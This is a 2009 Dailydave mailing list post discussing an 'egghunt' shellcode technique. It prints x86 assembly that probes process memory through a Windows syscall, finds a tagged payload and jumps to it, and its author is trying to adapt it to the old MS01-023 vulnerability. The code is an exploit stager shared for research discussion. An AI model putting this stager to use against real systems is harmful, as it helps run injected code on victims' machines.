Dailydave mailing list archives
Re: Merry Xmas & Happy "Search Memory for you Shellcode"...
From: "Nelson Brito" <nbrito () sekure org>
Date: Wed, 23 Dec 2009 12:36:33 -0200
What if? inc_page: and dx, 0FFFFF000h ; add PAGE_SIZE-1 to edx inc_byte: dec edx ; decrement our pointer by one Have anyone tested this yet??? /* * $Id: .siganture,v 1.3 2009-12-11 09:22:54-02 nbrito Exp $ * * Author: Nelson Brito <nbrito [at] sekure [dot] org> Copyright(c) 2004-2009 Nelson Brito. All rights reserved worldwide. http://fnstenv.blogspot.com */
-----Original Message----- From: Nelson Brito [mailto:nbrito () sekure org] Sent: Wednesday, December 23, 2009 12:16 PM To: 'dailydave () lists immunityinc com' Subject: Merry Xmas & Happy "Search Memory for you Shellcode"... Hey, fellows. I am get some spare time to work with a well-known technique called "egghunt", based on skape excellent article "Safely Searching Process Virtual Address Space" (http://www.hick.org/code/skape/papers/egghunt- shellcode.pdf). But while trying to perform this technique on a really old vulnerability (MS01-023) the egghunt doesn't work as good as I was expecting. The code: win32_syscall_forward_01 PROC start: xor edx, edx ; zeroing the edx, it is necessary to avoid BO in 'Release' inc_page: or dx, 0FFFh ; add PAGE_SIZE-1 to edx inc_byte: inc edx ; increment our pointer
by one
setup_syscall: push edx ; save edx on the stack push +02h ; push
NtAccessCheckAndAuditAlarm
pop eax ; pop into eax int 2Eh ; perform the syscall (KiSystemService()) cmp al, 05h ; did we get 0xc0000005 (STATUS_ACCESS_VIOLATION)? pop edx ; restore edx je inc_page ; yes, invalid pointer,
go to the
next page setup_badge: mov eax, "NBNB" ; throw our badge in eax check_badge: mov edi, edx ; set edi to the pointer
we
validated scasd ; compare the dword in
edi to eax
jnz inc_byte ; no match? increment
the pointer
by one scasd ; compare the dword in
edi to eax
again - which is now eax + 3 jnz inc_byte ; no match? increment
the pointer
by one badge_found: jmp edi ; found the badge, jump
8 bytes
past it into our code win32_syscall_forward_01 ENDP Well, I called this "forward" because it will try to find the code from "the place" BO happens to the end of STACK. Am I right? But in this vulnerability the stager shellcode will be placed in somewhere on the BUTTOM of the STACK, right? /* * $Id: .siganture,v 1.3 2009-12-11 09:22:54-02 nbrito Exp $ * * Author: Nelson Brito <nbrito [at] sekure [dot] org> Copyright(c) 2004-2009 Nelson Brito. All rights reserved worldwide. http://fnstenv.blogspot.com */
_______________________________________________ Dailydave mailing list Dailydave () lists immunitysec com http://lists.immunitysec.com/mailman/listinfo/dailydave
Current thread:
- Re: Merry Xmas & Happy "Search Memory for you Shellcode"... Nelson Brito (Dec 23)
- Re: Merry Xmas & Happy "Search Memory for you Shellcode"... Berend-Jan Wever (Dec 23)